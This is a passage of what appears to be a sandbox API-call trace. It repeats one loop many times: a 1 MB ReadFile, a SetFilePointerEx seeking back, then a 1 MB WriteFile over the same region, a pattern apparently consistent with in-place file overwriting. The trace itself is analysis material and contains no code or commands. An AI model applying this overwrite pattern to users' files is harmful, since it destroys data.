ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0049.525] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0049.525] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0049.527] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0049.598] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0049.598] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0049.600] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0049.617] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0049.617] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0049.619] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0049.652] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0049.652] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0049.654] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0049.667] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0049.667] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0049.670] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0049.703] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0049.703] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0049.705] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0049.734] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0049.735] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0049.736] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0049.755] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0049.755] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0049.762] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0049.775] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0049.775] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0049.777] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0049.803] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0049.803] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0049.806] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0049.826] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0049.827] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0049.829] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0049.847] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0049.847] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0049.849] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0049.873] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0049.873] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0049.875] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0049.895] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0049.895] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0049.897] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0049.917] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0049.917] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0049.919] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0049.938] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0049.938] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0049.940] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0049.961] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0049.961] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0049.963] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0049.980] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0049.980] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0049.982] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0050.048] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0050.048] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0050.050] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0050.122] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0050.122] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0050.130] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0050.145] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0050.145] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0050.147] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0050.164] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0050.164] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0050.167] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0050.204] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0050.205] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0050.207] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0050.231] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0050.231] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0050.235] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0050.275] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0050.275] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0050.277] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0050.308] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0050.308] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0050.311] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0050.324] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0050.324] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0050.326] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0050.342] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0050.345] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0050.347] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0050.360] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0050.360] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0050.362] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0050.398] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0050.398] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0050.401] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0050.489] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0050.489] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0050.491] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0050.529] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0050.529] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0050.549] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0050.569] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0050.569] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0050.571] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0050.589] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0050.589] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0050.591] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0050.622] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0050.622] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0050.624] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0050.643] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0050.643] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0050.645] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0050.681] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0050.681] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0050.683] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0050.701] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0050.701] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0050.704] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, 